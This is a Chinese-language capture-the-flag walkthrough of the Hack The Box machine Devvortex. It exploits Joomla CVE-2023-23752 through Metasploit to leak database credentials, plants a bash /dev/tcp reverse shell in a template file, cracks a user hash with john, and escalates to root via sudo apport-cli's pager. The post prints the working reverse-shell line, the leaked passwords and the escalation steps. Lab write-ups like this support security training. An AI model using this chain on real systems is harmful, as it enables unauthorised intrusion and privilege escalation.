title: HTB-Devvortex
date: 2023-12-14 16:15:11
categories: HTB
tag: 渗透
Devvortex
本题知识简介
Joomla未授权访问漏洞(CVE-2023-23752):
适用版本
4.0.0 <= Joomla <= 4.2.7
构造路由
/api/index.php/v1/config/application?public=true
apport-cli提权
信息收集
使用nmap进行扫描同时使用浏览器进行访问
修改hosts
10.10.11.242 devvortex.htb
然后去扫目录没有什么可用信息
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://devvortex.htb/FUZZ
Total requests: 45524
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 301 7 L 12 W 178 Ch "images"
000000002: 301 7 L 12 W 178 Ch "css"
000000004: 301 7 L 12 W 178 Ch "js"
Total time: 262.5244
Processed Requests: 5190
Filtered Requests: 5187
Requests/sec.: 19.76958
在去扫描子域名获得子域名
通过wfuzz去扫描子域名
wfuzz -w 指定字典 -u "http://devvortex.htb" -H "Host:FUZZ.devvortex.htb" --hl 7
000000499: 200 501 L 1581 W 23221 Ch "dev"
加入hosts然后去访问
10.10.11.242 dev.devvortex.htb
nmap扫描结果如下
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-14 16:28 中国标准时间
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 81.91 seconds
扫描子域名目录
扫出来了
000000001: 301 7 L 12 W 178 Ch "images"
000000040: 301 7 L 12 W 178 Ch "modules"
000000033: 301 7 L 12 W 178 Ch "includes"
000000037: 301 7 L 12 W 178 Ch "language"
000000026: 301 7 L 12 W 178 Ch "plugins"
000000013: 301 7 L 12 W 178 Ch "templates"
000000091: 301 7 L 12 W 178 Ch "media"
000000006: 200 501 L 1581 W 23221 Ch "index.php"
000000058: 301 7 L 12 W 178 Ch "cache"
000000138: 301 7 L 12 W 178 Ch "tmp"
000000132: 200 29 L 105 W 764 Ch "robots.txt"
000000151: 301 7 L 12 W 178 Ch "administrator"
000000201: 200 74 L 540 W 4940 Ch "README.txt"
000000198: 301 7 L 12 W 178 Ch "libraries"
000000209: 403 7 L 10 W 162 Ch ".DS_Store"
000000243: 200 0 L 0 W 0 Ch "configuration.php"
000000217: 301 7 L 12 W 178 Ch "components"
000000339: 200 172 L 1008 W 6858 Ch "htaccess.txt"
000000588: 200 501 L 1581 W 23221 Ch "home"
000000925: 403 7 L 10 W 162 Ch ".htpasswd"
000001005: 200 339 L 2968 W 18092 Ch "LICENSE.txt"
000001109: 301 7 L 12 W 178 Ch "cli"
000001149: 403 7 L 10 W 162 Ch ".thumbs"
访问readme.txt能够指定服务信息
访问robots.txt得到几个路由
User-agent: *
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
访问/administrator/是个登录框需要密码
那么我们在网上找这个漏洞
反弹shell
并且使用msfconsole来打
use scanner/http/joomla_api_improper_access_checks
ID Super User Name Username Email Send Email Register Date Last Visit Date Group Names
-- ---------- ---- -------- ----- ---------- ------------- --------------- -----------
649 * lewis lewis lewis@devvortex.htb 1 2023-09-25 16:4 2023-12-14 08:5 Super Users
4:24 8:39
650 logan paul logan logan@devvortex.htb 0 2023-09-26 19:1 Registered
5:42
[+] Config JSON saved to /home/iliy/.msf4/loot/20231214171300_default_10.10.11.242_joomla.config_395747.bin
[+] Joomla Config
=============
Setting Value
------- -----
db encryption 0
db host localhost
db name joomla
db password P4ntherg0t1n5r3c0n##
db prefix sd4fg_
db user lewis
dbtype mysqli
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
得到数据库账号和密码
然后登录点击system然后在templates的第一个里面修改代码,index.php只有读取权限写入不了那我们写error.php一样的
写入
system('bash -c "bash -i >& /dev/tcp/10.10.14.54/9999 0>&1"');
然后
nc -lvnp 9999
在根据这个路径进行访问即可得到shell
查看一下用户
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
fwupd-refresh:x:113:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
logan:x:1000:1000:,,,:/home/logan:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
查看到有/bin/bash的用户有
root:x:0:0:root:/root:/bin/bash
logan:x:1000:1000:,,,:/home/logan:/bin/bash
现在我们的目标就是logan
然后通过一开始获得的账号密码登录mysql
在select * from sd4fg_user得到logan的密码串,然后通过john进行解密
得到了logan密码
爆破出密码是tequieromucho
获取到logan的密码后登录
提交user.txt
提权
然后sudo -l
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
通过
sudo /usr/bin/apport-cli -c test.log less
V
!/bin/bash
获取到root权限